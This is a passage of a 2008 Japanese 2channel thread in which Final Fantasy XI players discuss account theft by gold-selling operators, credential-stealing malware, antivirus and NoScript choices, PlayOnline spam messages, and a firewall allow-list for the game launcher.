ttp://forums.opendns.com/comments.php?DiscussionID=226
要するにで ぐぐる先生使うとOpenDNSのサーバを経由させられる。
ttp://jp.techcrunch.com/archives/20080720opendns-makes-20kday-filtering-phishing-and-porn-sites/
フィルターすることで 利益と直結したサイトに誘導できる。

そういうのを納得してして使うなら 他人がどうこう言うことじゃないんだけど
最近わいてるOpenDNSマンセー君みて 何も知らずに子羊さんが使いそうで怖いww
114既にその名前は使われています:2008/09/08(月) 23:08:50 ID:0rBZ2CDi
>>113
OpenDnsマンセーなのは、情報交換が活発で
ほぼ即座に反映されるからだよ
お前らみたいに、「感染したどーしよ、感染してみるかw」
じゃないって事だ。
ちなみに、googleの関係でアンチOpenDnsがいるのは
知ってる。
まー、ここのスレ住人だったらほとんど仮想PC何台も持ってるだろうし
オンラインゲーマーなら仮想PC常識だから
OpenDnsの存在いらないんだろうけど
初心者系としては踏む前に回避できるという点は
非常にありがたい

>>111
多分、例えば楽天が同じミス起こせばおんなじ感じに
なると思うよ
115既にその名前は使われています:2008/09/08(月) 23:15:11 ID:J3J+5JJF
>>111
尼とかのメジャー通販サイトのキーロガーとかになれば話は違うはず
どこを見ても「たかがゲームじゃねえの?」って反応だからなあ
セキュリティに穴があるのはFFに限ってやばいってわけじゃないのに
116既にその名前は使われています:2008/09/08(月) 23:22:00 ID:dSq3Suf3
>>105
うはーNimda懐かしすぎるwww
次はクレズよろw
117既にその名前は使われています:2008/09/08(月) 23:24:20 ID:J3J+5JJF
>>105
俺の変な顔文字に見えるIDと交換してくれよ
なんかヒキオタっぽくて嫌なんだが
118既にその名前は使われています:2008/09/08(月) 23:38:58 ID:3R2Iap7Y
おやすみ前のあげ。
119既にその名前は使われています:2008/09/09(火) 00:24:14 ID:knuGnjo1
さがりすぎだーー
120既にその名前は使われています:2008/09/09(火) 00:29:54 ID:UTrgGkL7
馬鹿が軒並み感染し終えてFFXIの垢ハック効率は落ちてきただろうから
そろそろ業者側もメインのターゲットを変えてくると思うけどね

もっともそれでFFXIの垢が狙われなくなるわけじゃないけどな
別のターゲットを狙うついでにFFXIの垢も盗んでいくだけで
121既にその名前は使われています:2008/09/09(火) 00:54:42 ID:KNKXt9t/
効率が悪くなっても少しでも金が入ってくるならやめない
どうみても赤字なのに紙兵作り続けたり、
対価が悪いのにアメマン張ってたり、効率とかあまり関係ありません

全て食い尽くして、勝手に値下げして勝手に自滅してから
ようやっと他のに移動する、そんなやつらですよ

「儲かるなら俺も俺も」で、どんどん業者が増えていく
自分らで食い尽くして自滅するまで
メインのターゲットは移動せず、そのメインが2つ、3つ〜に増えていく感じ
122既にその名前は使われています:2008/09/09(火) 01:15:23 ID:UTrgGkL7
>>121
それはメインターゲットがFFXIの現状でも同じ
FFXIのサイトを重点的に改竄するような状況が変わるんじゃないかってこと

FFXIユーザーにとって状況が好転する話ではない
123既にその名前は使われています:2008/09/09(火) 01:26:30 ID:NHLtkFd4
あげ
124既にその名前は使われています:2008/09/09(火) 01:49:38 ID:KNKXt9t/
やばい、VUで加速してる
20分で170とか
あげ
125既にその名前は使われています:2008/09/09(火) 02:20:26 ID:KNKXt9t/
180
126既にその名前は使われています:2008/09/09(火) 02:23:35 ID:0tCB7TAk
ageage
127既にその名前は使われています:2008/09/09(火) 02:25:40 ID:axmnEoH3
http://www.playonline.com/pcd/verup/ff11/detail/3656/detail.html
≪プレイヤーの皆様へのお願い≫

VU告知に載せれば大多数は見るとは思うけど、
何でシステムメッセ使わないんだ?マジで
128既にその名前は使われています:2008/09/09(火) 02:39:12 ID:MD1/gN05
メンテ明けまで時間があるので徹底的にカスペオンラインスキャン走らせてみるかage
129既にその名前は使われています:2008/09/09(火) 02:39:31 ID:0bKpFSr2
>万が一、不正アクセスの被害に遭われた場合は、不正アクセス対策ページを
>よくご確認の上「不正アクセス専用チャットサポート」までご連絡ください。

のあとに

「これ以上不正アクセスが増えるようであれば、当社では利益的に
 対処しきれないのでWindows版を切り捨てます」

とか書いておけばいいのに
130既にその名前は使われています:2008/09/09(火) 02:41:06 ID:0bKpFSr2
>>128
オンラインでは徹底的にできませんから、お試し版なり製品版を入れた
ほうがいいと思いますよ
131既にその名前は使われています:2008/09/09(火) 03:09:49 ID:ymkbYNLJ
無料の Avira AntiVir Personal がいいですよ。
評判はとても良いです。
欠点は表示が英語というところでしょうか。
132既にその名前は使われています:2008/09/09(火) 03:15:12 ID:XVt/pF3W
>>129
Windows版切り捨てたらユーザー5分の1程度になるぞ
でバージョンうpの頻度も落ちサービス終了
133既にその名前は使われています:2008/09/09(火) 03:17:03 ID:c4zU3J+Q
>>132
半分以上はPS2ユーザじゃなかったか?
134既にその名前は使われています:2008/09/09(火) 03:33:55 ID:EdB8bo21
そりゃねーだろ
しかしながら半分も減ったらサービス終了は間違いないな
135既にその名前は使われています:2008/09/09(火) 04:01:18 ID:0bKpFSr2
>>132
本気で思ってるわけではないですけどね<切り捨て
それくらい脅さないと、なかなかユーザーの自己防衛が徹底しないと思ったからです
ここ見ている人は大丈夫でしょうけど、見てない人のほうが多いし
136既にその名前は使われています:2008/09/09(火) 04:02:13 ID:MD1/gN05
感染していませんでしたage
137既にその名前は使われています:2008/09/09(火) 04:05:37 ID:0bKpFSr2
ウィルス感染予防は99%のユーザー努力と1%のスクエニの対策
くらいに思って、みんながんばって(ほんとか?)
138既にその名前は使われています:2008/09/09(火) 04:45:43 ID:TnhxmMtL
先読みのうまいスクエニのことだからこのままの状況が続くようなら
139既にその名前は使われています:2008/09/09(火) 05:03:56 ID:0bKpFSr2
先読みがうまいんじゃなくて先読みが下手すぎ<スクエニ
140既にその名前は使われています:2008/09/09(火) 05:06:30 ID:e0e1ARsf
■e<その評価は想定外
141既にその名前は使われています:2008/09/09(火) 05:10:13 ID:0bKpFSr2
想定外じゃなくて、評定外よ>スクエニ
142既にその名前は使われています:2008/09/09(火) 06:26:25 ID:fdQyCNxB
TOPに堂々と書いて欲しいな〜
ttp://www.playonline.com/pcd/verup/ff11/detail/3656/detail.html
143既にその名前は使われています:2008/09/09(火) 07:38:20 ID:sWekap9H
おはようのあげ。
144既にその名前は使われています:2008/09/09(火) 08:44:15 ID:Yiz1wqrO
あげげ
145既にその名前は使われています:2008/09/09(火) 10:35:27 ID:kb03tJo8
>>29の件と関係ありそうなBlogエントリ。
ttp://www.accessup.org/pj/Barnirun/20080902.html
対ニコニコ向け改竄は確実に進行しているようだ。
146既にその名前は使われています:2008/09/09(火) 10:47:15 ID:Yiz1wqrO
沈んでいるのでage
147既にその名前は使われています:2008/09/09(火) 11:14:37 ID:Le83eebv
>>29>>145のはニコのIDから察するに同じ人みたいだ。
感染したワームは 物理ドライブや リムーバルドライブ経由で自己増殖するやつで
(オートラン系のあれ) しかもドロッパ不明ラシイヨ。
トレンドマイクロみてきたがプロセス殺して レジストリ相当いぢらないと駆除できないから
この人の学校とか友人のPCとか軒並み感染してるのかも。
そしてそこからまた無限増殖以下ループ。
見えないからぺけれあよりオソロシスかもだな。

148既にその名前は使われています:2008/09/09(火) 11:32:33 ID:1Ny4Et0m
>>145
1回ドロッパ入ると、ウィルス169種類も呼び込むのかw すげえw

その上検知できてない奴もまだありそうだ。
149既にその名前は使われています:2008/09/09(火) 13:01:26 ID:2VmfVh1w
業者追放スレで太公望買った奴がふるぼっこワロスw
150既にその名前は使われています:2008/09/09(火) 13:12:35 ID:kb03tJo8
>>147,148
破壊活動の一環として、レジストリエディタの起動も阻害されるみたいだから、まずそこから修復する必要があるのが手間ぽい。
それと、見知らぬファイルの存在に気付いて、オンラインスキャンを掛けた段階で発覚した様だから、セキュリティソフトを
常用している訳ではないのがまた問題。
以前から、また別のマルウェアを飼っていた可能性もあり得るな。

ttp://mainichi.jp/life/electronics/news/20080905mog00m100029000c.html
この記事でも、
>「(ウイルス対策をしない)『永遠のビギナー』がだまされて連れて行かれる悪性ウェブサイトの情報の共有が必要だ」
と〆られているように、パソコンを使い始める段階からの啓蒙が必要な時代だと痛感。
以前のMSNバンドルではないけど、PCメーカーも特定のセキュリティソフトだけでなく、初期設定で導入するソフトを選べるような
バンドル形態にでも移行してくれないものかね……
151既にその名前は使われています:2008/09/09(火) 14:15:12 ID:bnQp6Lrv
今日は落ちるのはやいなあ
152既にその名前は使われています:2008/09/09(火) 14:22:41 ID:O9Q5jCQj
これのせいじゃないだろうか

シンクバグwwwwwwwwwwwwwww
http://changi.2ch.net/test/read.cgi/ogame/1220933265/
153既にその名前は使われています:2008/09/09(火) 14:25:55 ID:Le83eebv
//www.excite-blog●com/ってさー リネとかFFのパスぬくとろりんのダウンローダだよね?
ニコニコへの送信を書き換えてるのか ログインして書き換えてるのかは不明か。
まー ニコの垢ぬいたとこでうれるもんないしな・・

>>13がはってくれてるキャッシュは /keyword なんだけど
ブログでかいてあるほうのも キャッシュあってさー
そっちは .rarまで ばっちりはいってる(た)のさ。
つべのアドレスだから ちゃんと読めば怪しいのはすぐわかるんだけど・・・
まだ 駆除してないみたいだし回線抜いてクリーンインストールしてほしい。

www.excite-blog●comのスパムコメントも 7月くらいまではこぴぺばっかだったのが
8月はいって バラエティ出てきたのもこのトロイのせいかもわからんね。
気づいてない感染者が botになってるみたいなさー。
154既にその名前は使われています:2008/09/09(火) 15:21:19 ID:pQnuC6Df
ハックされてたぜいやっほーーーーう!!
ただ今まで何個か報告見てたけど、なんか俺のは変だった
報告やうわさ、フレの体験談では素っ裸で金になるアイテムは全部売られてたんだよな
でもなぜか俺の場合、高価な武器防具だけがなくなってた・・・
ほかのクリやら、ちょっとした装備やら、アイテムは無傷。
最近の業者は速度重視なんだろうか
155既にその名前は使われています:2008/09/09(火) 16:09:14 ID:FAEJQdbw
ソーシャルハックじゃないか?
知り合いとかにIDパスを教えてたりしない?
156既にその名前は使われています:2008/09/09(火) 16:18:22 ID:6RMmb6mC
タル♀専用裏LSスレの
怒ったかーちゃんに高額装備を無料配布されてしまう浮気親父を思い出した
157既にその名前は使われています:2008/09/09(火) 16:34:32 ID:IwqkXjbN
>>155
いや、誰にも教えてない!
でもさっき巻き戻し報告スレ見た限りでは
俺みたいに微妙に残ってたり、高額装備以外が残ってる人もいるっぽい!
158既にその名前は使われています:2008/09/09(火) 16:51:44 ID:Nr9l22bb
>>154
俺もそんなもんだよ
数十万以上の装備とギルだけで
白門競売に放置
159既にその名前は使われています:2008/09/09(火) 17:25:22 ID:XfUUNBwW
Movable TypeにXSS脆弱性、最新版にアップデートを
http://internet.watch.impress.co.jp/cda/news/2008/09/09/20803.html
160既にその名前は使われています:2008/09/09(火) 17:52:32 ID:CYHnh1am
カスペルスキーオンラインスキャンやってみたんですが、
数種類ある内の、マイコンピュータだけですべて調べれるんでしょうか?
マイコンピュータとハードディスクの2つやると調べ終わった。と言えるんでしょうか?
161既にその名前は使われています:2008/09/09(火) 18:49:19 ID:8iW9oQWs
age
162既にその名前は使われています:2008/09/09(火) 19:37:34 ID:by8t1Q8S
とりあえず
にこにこウイルスは、専門家の
http://www.higaitaisaku.com/

163既にその名前は使われています:2008/09/09(火) 20:22:32 ID:ENRTMYLf
age
164既にその名前は使われています:2008/09/09(火) 20:36:49 ID:BFQDYRtV
>>160
マイコンピュータ選択で「ロック部分」以外はスキャンされます
ただし、Windowsが動いてることが条件のオンラインスキャンでは
PCの中を確実に100%スキャンできないことをわかっていてくださいね
165既にその名前は使われています:2008/09/09(火) 20:38:04 ID:OruOYCjf
製品版だとWindowsが動いてないときでもスキャンできんの・・・?
166既にその名前は使われています:2008/09/09(火) 20:39:35 ID:VWteJrpg
セーフモードって知ってます?
167既にその名前は使われています:2008/09/09(火) 20:46:31 ID:SHBsJIxf
ニコニコの相当酷いな
Flashの脆弱性使われたんじゃないだろうしなあ
168既にその名前は使われています:2008/09/09(火) 20:50:44 ID:yDDu/hK4
垢ハックされてやっと復旧できたんだけど
とりあえず、spybot入れて垢ハックされたノートン止めてカスペ入れたんだけど
あとは、ブラウザも変えたほうがいい?
とりあえずIE以外なら何でもいいのかな。
169既にその名前は使われています:2008/09/09(火) 20:56:00 ID:BFQDYRtV
>>168
SpybotのTeaTimerは監視が甘いですから、あまり信用されませんように
ブラウザはスクリプトさえ不許可にしていればIEでもほかのでも大丈夫です
170既にその名前は使われています:2008/09/09(火) 20:57:43 ID:SHBsJIxf
火狐+Noscript+PG2その他最新うpdateで
まあ盲信はしない程度にだけど安心出来るんじゃないの
このレスの一秒先は知らない
171既にその名前は使われています:2008/09/09(火) 20:58:39 ID:fdQyCNxB
まずクリーンインストールしました?
172既にその名前は使われています:2008/09/09(火) 21:00:37 ID:BFQDYRtV
安心できる環境なら仮想を入れる以外にないと思いますね
わたしは入れてませんけど
そもそも感染したのをセキュリティソフトのせいにしている段階で
次の感染が目に見えてますよ>>168
173既にその名前は使われています:2008/09/09(火) 21:05:53 ID:TnhxmMtL
>>168
ノートンがありながらカスペを選んだ時点で暗い未来が見えた。
174既にその名前は使われています:2008/09/09(火) 21:06:21 ID:BFQDYRtV
>>168のためを思ってもっと突っ込んでおこう

カスペルスキーをデフォルトのままで使ってるならノートンを100%使いこなせてる以下ですから
ちゃんとカスペルスキーの設定も勉強してくださいね?
175168:2008/09/09(火) 21:20:48 ID:yDDu/hK4
クリーンインストールは、しました。
ノートンを使いこなせてないってのは、そのとおりかも
余り内容が分からず手動で検査してたぐらいだから
とりあえず、カスペの勉強してきます。
176既にその名前は使われています:2008/09/09(火) 22:01:49 ID:knuGnjo1
ほしゅ
177既にその名前は使われています:2008/09/09(火) 23:08:01 ID:BFQDYRtV
201からあげ
178既にその名前は使われています:2008/09/09(火) 23:57:39 ID:ENRTMYLf
age
179既にその名前は使われています:2008/09/10(水) 00:30:35 ID:wvnIATMK
180既にその名前は使われています:2008/09/10(水) 00:35:38 ID:haPOrOHr
polいたら知らない外人からRMTの宣伝みたいなメッセきたんだけどなんだろう?
PS2とXBOXでしかしてないんだけど大丈夫なのかな?
181既にその名前は使われています:2008/09/10(水) 00:54:22 ID:hmKtyL7L
>>180
フレンドサーチあたりからランダムに狙ってんのかな
とりあえず相手しなきゃ無問題かと
182既にその名前は使われています:2008/09/10(水) 01:14:35 ID:uS1azy5p
ニコニコがどうのこうの話題にでてるけど、
ハクられた赤が罠URLを張ってるだけ?
それとも改竄されてスクリプトが埋め込まれた?
183既にその名前は使われています:2008/09/10(水) 01:34:56 ID:i+0PiHSG
>>182
スレをする限りでは、うp主のコメにURLが貼り付けてある
って感じのようだが
改ざんなんてされてたら、ほとんどの香具師がアウトになるな
もちろん俺もw
184既にその名前は使われています:2008/09/10(水) 01:36:24 ID:i+0PiHSG
すまん さげてた
185既にその名前は使われています:2008/09/10(水) 01:38:01 ID:uS1azy5p
ですよねー

俺もニコはscript許可してるんで改竄されたらおわりだw
186既にその名前は使われています:2008/09/10(水) 01:58:12 ID:ZH77lAf2
報告を見る限りでは、妙なURLをコピペして接続しなきゃ大丈夫なんじゃないです?
まぁ、ニコ動は見たことがないからよくわからないですけど
187既にその名前は使われています:2008/09/10(水) 02:04:57 ID:c0AQu/1w
>>185
それってニコニコ見る時だけ手動で許可してるんですか?
188既にその名前は使われています:2008/09/10(水) 02:24:58 ID:ZH77lAf2
>>187
スクリプトの許可・不許可はどのブラウザでも手動で切り換える以外に
方法はありません
189既にその名前は使われています:2008/09/10(水) 02:50:20 ID:vdDOXBs1
MSの月例パッチきてるー
190既にその名前は使われています:2008/09/10(水) 04:32:51 ID:+J/jM1Di
>>168
デスクトップPCなら、
リムーバブルケースとHDDをもう一台買って
ゲーム用のHDDとそれ以外と分けるのも1つの方法かと。
(今なら両方で1万ぐらいでしょう)
同じPCなのでアクティベートも問題なく通ります。

ゲーム用のHDDではゲームしかしない。
少し面倒ですが。
191既にその名前は使われています:2008/09/10(水) 05:09:36 ID:MyZKqgel
218からあげ
192既にその名前は使われています:2008/09/10(水) 05:44:49 ID:CMImgkEn
>>180
通報するべし
193既にその名前は使われています:2008/09/10(水) 06:00:02 ID:9R0YN0YX
●● RMT業者の垢ハックが多発している件40 ●●
http://changi.2ch.net/test/read.cgi/ogame/1220963962/l50
194既にその名前は使われています:2008/09/10(水) 06:44:31 ID:ZulBeyJw
マジで死なねーかな犯罪業者、釣り業者とかのがよっぽどかわいいわ
195既にその名前は使われています:2008/09/10(水) 06:48:04 ID:Jhy/Kxuz
>>194
ぶっちゃけ、両方とも同一業者なんですけどね
196既にその名前は使われています:2008/09/10(水) 07:11:31 ID:EHLWnY4B
janestyleもs11●XREA●comだったわ
あぶないのか
先日から2.77から2.83にものすごいいきおいでバージョンアップしたが
197既にその名前は使われています:2008/09/10(水) 09:29:29 ID:yft6myK3
保守
198既にその名前は使われています:2008/09/10(水) 09:36:43 ID:ORZaOQg+
>>187
FirefoxのNoScriptを使えば、「nicovideo.jpのスクリプトだけを許可」とか
「google.co.jpだけを許可」とかできるよ。
199既にその名前は使われています:2008/09/10(水) 09:36:46 ID:3rrxHyXh
ニコニコ百科事典にクロスリンクスクリプト?とかいうのが埋め込まれてたらしい
flash系の不具合じゃないな
200既にその名前は使われています:2008/09/10(水) 10:25:02 ID:jkxoHptp BE:246758933-2BP(560)
>>180
俺も今日きてた、ちなみにPC
フレになってないのにメッセージって送れる物なんだっけ?
なんか不気味だな
サイトの宣伝みたいなのも書いてあった
Hugecheap.comとかいうところ
怖いのでサイトは見てないw
201既にその名前は使われています:2008/09/10(水) 11:43:37 ID:yatTf4Zz
マイクロソフトが9月の月例パッチ公開、“緊急”4件
http://internet.watch.impress.co.jp/cda/news/2008/09/10/20809.html
202既にその名前は使われています:2008/09/10(水) 12:08:49 ID:4irmkzbv
Windowsうpだーてage
203既にその名前は使われています:2008/09/10(水) 13:17:41 ID:yatTf4Zz
窓の杜 - 【NEWS】「Google Chrome」初のセキュリティアップデート、更新内容の詳細が公表
http://www.forest.impress.co.jp/article/2008/09/09/googlechrome.html
204既にその名前は使われています:2008/09/10(水) 15:14:17 ID:5g01Eykn
浮上
205既にその名前は使われています:2008/09/10(水) 15:31:06 ID:/FGZGEJE
>>200
俺もきてたw同じところから
時間がなくてGM呼べなかったから、こんなもん着てるぞゴラァってSTTにメールしといた
206既にその名前は使われています:2008/09/10(水) 15:37:25 ID:Pba1R0dy
最近このスレでちらほら言われてるリムーバブルケースとHDDを買って
ゲーム用のHDDに〜ってのよく見るんだけど、
外付けHDDにインスコするのとはまた別なんでしょうか?
207既にその名前は使われています:2008/09/10(水) 15:38:49 ID:5bleATyV
ゲーム内でまでSPAMとか必死にも程が有るわwww
BANはやくきて〜はやくきて〜
208既にその名前は使われています:2008/09/10(水) 16:00:42 ID:UAjbBo97
>>206
ぜんっぜん違う
209既にその名前は使われています:2008/09/10(水) 16:11:24 ID:UAjbBo97
ちと不親切だったか

スレで安全対策として出てくるリムーバブル云々は
「内蔵HDDを簡単に交換できるパーツを買ってきて
ゲームとそれ以外で別々の内蔵HDDを使う」って話

外付けHDDには基本的にWindowsをインストールできないし
両方の環境で同じ内蔵HDDが使えるならセキュリティ上も意味なし
210既にその名前は使われています:2008/09/10(水) 16:14:29 ID:9SwW06UW
あれビスタでPG2って動かないのか?
履歴が表示されないんだが
211既にその名前は使われています:2008/09/10(水) 16:17:24 ID:Pba1R0dy
>>209
なるほどw やっぱそんなに簡単な事じゃなかったかw
わざわざご丁寧にありがとうございますm(_ _)m

 
そーいえば、最近ニコ動も騒がれてるけど、火狐3+Noscriptで動画見るためにnicovideo.jpを許可すると上のネトゲの広告とか、
アマゾンの市場も許可してしまうんだよな、、、動画だけを見るようにすることはできないのかな
212既にその名前は使われています:2008/09/10(水) 16:21:07 ID:uS1azy5p
>>211
adblock+を入れるといい
213既にその名前は使われています:2008/09/10(水) 16:22:19 ID:uS1azy5p
というかあのネトゲの広告とかいつかヤバイことになりそうだよなw
アマゾンはときどきPG2三国リストで弾く鯖読みに行ってるし
214既にその名前は使われています:2008/09/10(水) 16:40:07 ID:+J/jM1Di
>>211
一時的にでよければ
動画が表示されるべきエリア(領域)にカーソルを持っていって、
右クリックするとそこのリンクだけを許可(または一時的に許可)という指定もできるよ。
215既にその名前は使われています:2008/09/10(水) 16:47:25 ID:v7BsPFSp
うちのブログのアクセスログより。
ttp://www.google.cn/search?as_q=inurl%3Ablog-entry%20ff11
これは罠コメや罠TB用かねぇ。手法としちゃレトロだが。
216既にその名前は使われています:2008/09/10(水) 16:50:13 ID:Pba1R0dy
いちよう、今色々イジってみた所、nicovideo.jpは許可して
広告とアマゾン市場(ecx.images-amazon.com、広告の方は失念)の広告の画像の右クリNoscript
のオプションで画像を読み込まないって設定したら、広告は消えて、アマゾンの方も市場は出てるけど
画像は全く表示されない状態になりました。
いちよこれでもOKなのかな
217既にその名前は使われています:2008/09/10(水) 16:52:32 ID:5bleATyV
動画だけ見てえんだよ!って話ならCraving Explorerとか使った方が良いんじゃないかなーと思う
コメントしつつ見たいなら仕方無いか
218既にその名前は使われています:2008/09/10(水) 17:10:10 ID:+J/jM1Di
>>206
◆リムーバブルケースを使うには

a)リムーバブルケースはこういうやつ↓
ttp://www.ratocsystems.com/products/subpage/sarc1.html
b)SATAのタイプだとスリムなやつも出てる
ttp://www.taoenter.co.jp/productdetail/EZ-RACK-01B/features.php

80GBのHDDが4,000円ぐらいから、ケースも4,000円ぐらいだから
予算的には計8,000円ぐらい。

作業としては、
1)5インチベイにリムーバブルケースをネジで止め、
 今つながっているHDDへのケーブルをつなぐ
→b)のタイプならこれだけで中身のHDDを入れ替えできる
2)a)のタイプはリムーバブルケース(交換部分)にHDDを入れる(2個付いてる)
3)新しいHDDにはOSを入れなおす(リカバリディスクでもいけるはず)。

あとはゲームとそうでないときで入れ替える。電源は必ず切ってね。
219既にその名前は使われています:2008/09/10(水) 17:14:00 ID:vENvMGvG
一応、報告しとくな。
今日の深夜にRMT業者からメッセージが届いたんだけど、おまいらどうよ?

件名:Hugecheap.com FFXI Gil Full stock now
本文省略

ちなみに、この業者のページを踏んだことはない。
俺自身は気楽にプレイしているだけだけど、垢ハックとかは勘弁してほしいし、大丈夫かな…不安だ。
220既にその名前は使われています:2008/09/10(水) 17:14:29 ID:it84yHHV
221既にその名前は使われています:2008/09/10(水) 17:15:27 ID:yatTf4Zz
「GDI+」の脆弱性、Windows 2000環境がある企業などで要確認
http://internet.watch.impress.co.jp/cda/news/2008/09/10/20815.html
222既にその名前は使われています:2008/09/10(水) 17:16:58 ID:hmKtyL7L
10月でライセンス切れるからカスペに乗り換えるかなー
223219:2008/09/10(水) 17:17:05 ID:vENvMGvG
うわ、、、他にもいたじゃん。俺の馬鹿
スレ汚しすまそ
224既にその名前は使われています:2008/09/10(水) 17:17:38 ID:PkKLWs49
>>219
POLのメッセージでしょ
うちにもきた
225既にその名前は使われています:2008/09/10(水) 17:24:01 ID:+J/jM1Di
ところで、フレに聞いた話では
外ではアクセスしない、セキュリティは気にしてる
(少なくともOS乗っ取られレベルはないはず)ということなので、

1)保存していたログインパスワードファイルがトロイの木馬などで送信された
2)デフォルトのパスワードのままだったからそれが解析された。
3)メモリを直接よまれた?
4)実は◆eの内部流出

が原因だと仮定した場合、1に関しては「パスワードを保存しない。」と
いう事は有効なんだろうか。
そのとき、キーボードで入力するより、ソフトキーボードの方が安全だと思うんだG、
入力が面倒。
複雑なキーもマウス操作を記憶してボタン一発でパスワードを入力できる
ソフトって必要?他にも安全対策関連のアイディアがあるなら、
プログラム作ってみようと思うんだが。
226既にその名前は使われています:2008/09/10(水) 17:31:52 ID:hGJGqFoz
POLのFAQ探してきた。
Q11583
Q:メッセージは誰にでも送れるのでしょうか?
A:プレイオンラインに登録されている『ハンドル』すべてに対してメッセージを送れます。
ただし『フレンド登録』をしていない相手には『友達になろうよ!』メッセージのみ送れます。
Q11585
Q: 『友達になろうよ!』メッセージに登録していない相手から『メッセージ』が届くのですが、
なぜですか?
A:通常の『メッセージ』は『フレンド登録』した者同士で送受信できます。
相手からの「友達になろうよ!」メッセージに「登録する」にした場合は、
その相手が自分のフレンドとして登録されます。
もし、登録した覚えのない相手から『メッセージ』が届いた場合は、
『フレンド登録』しているフレンドが別の『ハンドルネーム』で『メッセージ』を送信してきたか、
またはあなたが『プレイオンライン・チャット』中に、
チャットメンバーがメッセージを送信してきたことが考えられます

POLのシステムを不正利用してるか フレンド登録してる誰かがはくられたんじゃないかね。
227既にその名前は使われています:2008/09/10(水) 17:32:11 ID:Nr7yjaxp
>>225
> 外ではアクセスしない
これどういうこと?外ってどこ・・・?

>1に関しては「パスワードを保存しない。」という事は有効なんだろうか。
保存するのとどっちがいいか微妙。
保存してるのを持っていく場合もあれば、入力する時に持っていかれることもある。
どっちにしても(今まで使われた)メモリ参照のウィルスならいっしょだけど。

> プログラム作ってみようと思うんだが。
何したってPOLを使う時点で無駄じゃない?
あえていえばHIPS作るとかかね。
228既にその名前は使われています:2008/09/10(水) 17:33:04 ID:wTUCoorm
>>225
今回話題のウィルスは、POLがパスを送信するときにパスを抜いていくものですよ?
そういうことじゃないのかな?
229既にその名前は使われています:2008/09/10(水) 17:33:39 ID:v7BsPFSp
余計なツールは作らんほうがいい
230既にその名前は使われています:2008/09/10(水) 17:33:54 ID:uuGcoEnG
>>227
たとえばネットカフェからFFをしない、ってことでは?
231既にその名前は使われています:2008/09/10(水) 17:37:17 ID:wTUCoorm
>>225は今回のアカウントハックとは別のなにかを言おうとしているの?
232既にその名前は使われています:2008/09/10(水) 17:44:12 ID:+J/jM1Di
>>228
じゃあどうにでも対策できるものじゃんヽ(`Д´)ノ■e

つまりそのパスワードを特定のIPアドレス外には送れないようにすればいいわけかな?
233既にその名前は使われています:2008/09/10(水) 17:45:02 ID:Nr7yjaxp
>>230
なるほど。

でも、デフォルトのパスワードって何だ?
あんまり真面目に読んじゃだめな文章なのかなw

ツール作りたいなら勝手にしていいけど配布はするなよ。
そのフレに渡すだけにしとけ。 んでアカハックされらた多分犯人は>>225
234既にその名前は使われています:2008/09/10(水) 17:45:34 ID:wTUCoorm
>>232
ですね
そのためにPOLのファイアウォール設定が出してあります
235既にその名前は使われています:2008/09/10(水) 17:47:26 ID:wTUCoorm
>>232
って、スレ番書き忘れた
>>4にあります
236既にその名前は使われています:2008/09/10(水) 17:48:01 ID:Nr7yjaxp
>>232 どうにでも対策できるものじゃん

・特定のIPアドレスってどこだと思ってる?w
・この間見つかった奴は独自プロトコルover httpsで設計されてたのにどうやって
 「パスワード」を送信していると判断するつもり?w
237既にその名前は使われています:2008/09/10(水) 17:49:01 ID:Nr7yjaxp
>>234
POLプロセスで送信するわけじゃない。injectionを使ってIEでもノートパッドでも
エクスプローラーでもどのプロセスから送るか分からない。
238既にその名前は使われています:2008/09/10(水) 18:14:38 ID:HDqreeXy
>>217
あれIEベースだけど大丈夫なのか?
239既にその名前は使われています:2008/09/10(水) 18:15:54 ID:5bleATyV
>>238
良く考えたら余計危ないか・・
240既にその名前は使われています:2008/09/10(水) 18:22:53 ID:v7BsPFSp
リネージュ アイテム封印サービス
ttp://lineage.plaync.jp/security/huuin.aspx
これちょっとおもしろい。
自分でアイテムにEx付ける感じ(捨てることもできなくなる)。
数日〜1週間(定期メンテまで)の時間稼ぎにしかならんけど。
241既にその名前は使われています:2008/09/10(水) 18:28:15 ID:5bleATyV
>>240
これ解除も出来るんじゃないのかね
242既にその名前は使われています:2008/09/10(水) 18:28:41 ID:qq0yJ2Em
>>240
週末プレイヤーとかは泣きそうだな。
でも今の巻き戻し一回だけ、の現状ではお間抜けさんにとっては最後の砦になるんじゃないか?

若しくはコレを盾に、対応しない代わりに巻き戻し回数増やさせるとかさ。
EQ2のメンター制を取り入れるぐらい柔軟性が出てきたし要望出しまくればやってくれるカモよ?
243既にその名前は使われています:2008/09/10(水) 18:31:16 ID:0qqdueuQ
なんかPOLでfgrfgrとかいうガルカからメッセが来てたんだが・・・
業者うぜぇぇぇ
244既にその名前は使われています:2008/09/10(水) 18:33:17 ID:mvuL1eml
つーか、WoWでやってるトークンを利用したワンタイムパスワードをFF11でも
入れるって話になってるよな。それさっさとやってくれれば、パスワード盗難は
ほぼありえなくなる。

物理的に家に泥棒が入ってトークンを盗まれる可能性は残るが。
245既にその名前は使われています:2008/09/10(水) 18:36:20 ID:AtjPKwBT
何で俺にはメッセージこないんだ?
246既にその名前は使われています:2008/09/10(水) 18:40:07 ID:F2ytF2Ov
>240
完美は1年半前に正式サービス開始と同時にそれ導入してたよ
アイテム課金で1個100円
ま、完美は運営の鯖がハックされて意味なかったけどねw
247既にその名前は使われています:2008/09/10(水) 19:22:20 ID:20xbD6x5
>>246
ついでに、完美の運営鯖ハック祭りのあと
そのアイテムは10円相当に引き下げられた
248既にその名前は使われています:2008/09/10(水) 19:37:50 ID:qq0yJ2Em
余計なスキャン省略、高速化を図った「ノートン2009」
ttp://internet.watch.impress.co.jp/cda/news/2008/09/10/20814.html

パスワード詐取などの犯罪対策を強化した「ウイルスバスター 2009」
ttp://internet.watch.impress.co.jp/cda/news/2008/09/10/20813.html

Kaspersky 2009シリーズ発表、検知エンジンを刷新して高速化
ttp://internet.watch.impress.co.jp/cda/news/2008/09/10/20818.html
249既にその名前は使われています:2008/09/10(水) 19:40:39 ID:wTUCoorm
テンプレ改定

■POL用ファイアーウォールの設定(アプリケーションルールでpol.exeの設定)
※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。
※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。
許可しているリモートIPの範囲
61.195.48.0-61.195.55.255 (61.195.48.0/21)
61.195.56.0-61.195.59.255 (61.195.56.0/22)
61.195.60.0-61.195.63.255 (61.195.60.0/22)
202.67.48.0-202.67.63.255 (202.67.48.0/20)
219.117.144.0-219.117.159.255 (219.117.144.0/20)
